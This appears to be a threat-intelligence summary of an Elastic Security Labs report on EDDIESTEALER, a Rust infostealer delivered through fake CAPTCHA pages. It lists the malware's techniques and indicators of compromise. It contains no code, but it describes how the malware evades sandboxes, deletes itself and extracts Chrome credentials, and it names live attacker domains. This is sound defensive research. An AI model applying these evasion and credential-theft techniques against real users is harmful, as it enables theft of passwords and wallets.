Threat Research

Chasing Eddies: New Rust-based InfoStealer used in CAPTCHA campaigns, Elastic Security Labs

Elastic.co
Chasing Eddies: New Rust-based InfoStealer used in CAPTCHA campaigns, Elastic Security Labs

Elastic Security Labs discovered EDDIESTEALER, a novel Rust-based infostealer distributed through fake CAPTCHA campaigns that trick users into running malicious PowerShell scripts. The malware targets Windows hosts to steal sensitive data such as credentials, browser information, and cryptocurrency wallets. #EDDIESTEALER #FakeCAPTCHA #RustMalware

Keypoints

  • EDDIESTEALER is a newly identified Rust-based infostealer delivered via fake CAPTCHA verification pages that persuade users to execute malicious PowerShell commands.
  • The infostealer communicates with a command and control (C2) server to receive task lists specifying targeted data types, which include credentials, browsers, password managers, FTP clients, messaging apps, and crypto wallets.
  • Malware uses advanced obfuscation techniques including XOR string encryption, custom WinAPI lookup methods, and stripped Rust function symbols requiring specialized analysis tools.
  • EDDIESTEALER performs sandbox detection by checking system physical memory and can self-delete using NTFS alternate data stream renaming to avoid detection and removal.
  • It implements Chromium-specific credential theft by spawning hidden or off-screen browser windows to read process memory and uses Chrome’s remote debugging protocol to extract saved passwords.
  • Recent variants have expanded capabilities including system profiling (processes, GPU, CPU info) and altered C2 communication with hardcoded encryption keys and server-side sandbox evasion.
  • Initial infection vector involves obfuscated React-based JavaScript displaying fake CAPTCHA interfaces that copy PowerShell commands into the clipboard for user execution.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Use of PowerShell commands copied to clipboard and executed via Windows run dialog to deploy malware (“…malicious PowerShell script…”).
  • [T1547] Boot or Logon Autostart Execution – Creation of a unique mutex to prevent multiple instances from running, ensuring persistence (“…creating a mutex named by a decrypted UUID string…”).
  • [T1036] Masquerading – Use of fake CAPTCHA pages mimicking legitimate Google reCAPTCHA to lure users (“…mimicking Google’s reCAPTCHA verification interface…”).
  • [T1105] Ingress Tool Transfer – Downloading second-stage payloads (gverify.js and EDDIESTEALER executable) from attacker-controlled domains (“…silently downloads… saves to Downloads folder…”).
  • [T1071] Application Layer Protocol – Use of HTTP for C2 communication sending encrypted data and receiving commands (“…C2 communication characterized by multiple, task-specific POST requests over HTTP…”).
  • [T1204] User Execution – Social engineering to persuade users to run commands from clipboard (“…instructions to press Windows + R, then Ctrl + V to paste malicious command…”).
  • [T1543] Create or Modify System Process – Spawning hidden or off-screen browser processes to extract credentials (“…spawns new browser instance with window off-screen using specific command-line arguments…”).
  • [T1027] Obfuscated Files or Information – Encryption of strings via XOR and obfuscated JavaScript loaders (“…strings encrypted via simple XOR cipher… gverify.js is obfuscated…”).
  • [T1005] Data from Local System – Targeted exfiltration of files including crypto wallets, browsers, password managers, FTP clients, and messaging apps (“…reads targeted files using kernel32.dll functions…”).
  • [T1562] Impair Defenses – Self-deletion using NTFS alternate data streams to evade analysis and removal (“…self-deletes by renaming NTFS alternate data streams…”).

Indicators of Compromise

  • [SHA-256 hashes] Multiple EDDIESTEALER sample hashes – e.g., 47409e09afa05fcc9c9eff2c08baca3084d923c8d82159005dbae2029e1959d0, 162a8521f6156070b9a97b488ee902ac0c395714aba970a688d54305cb3e163f, and others mentioned for various loader and executable files.
  • [Domain names] Malware and infrastructure C2 and intermediate domains – llll.fit, plasetplastik.com, militrex.wiki, shiglimugli.xyz, xxxivi.com.
  • [IPv4 addresses] C2 and infrastructure IPs – 45.144.53[.]145, 84.200.154[.]47.
  • [File names] EDDIESTEALER loaders and payloads – verifcheck.exe, g_verify.js, verif.js, AegZs85U6COc.exe, PETt3Wz4DXEL.exe, Tk7n1al5m9Qc.exe, and others with pseudorandom names.

Read more: https://www.elastic.co/security-labs/eddiestealer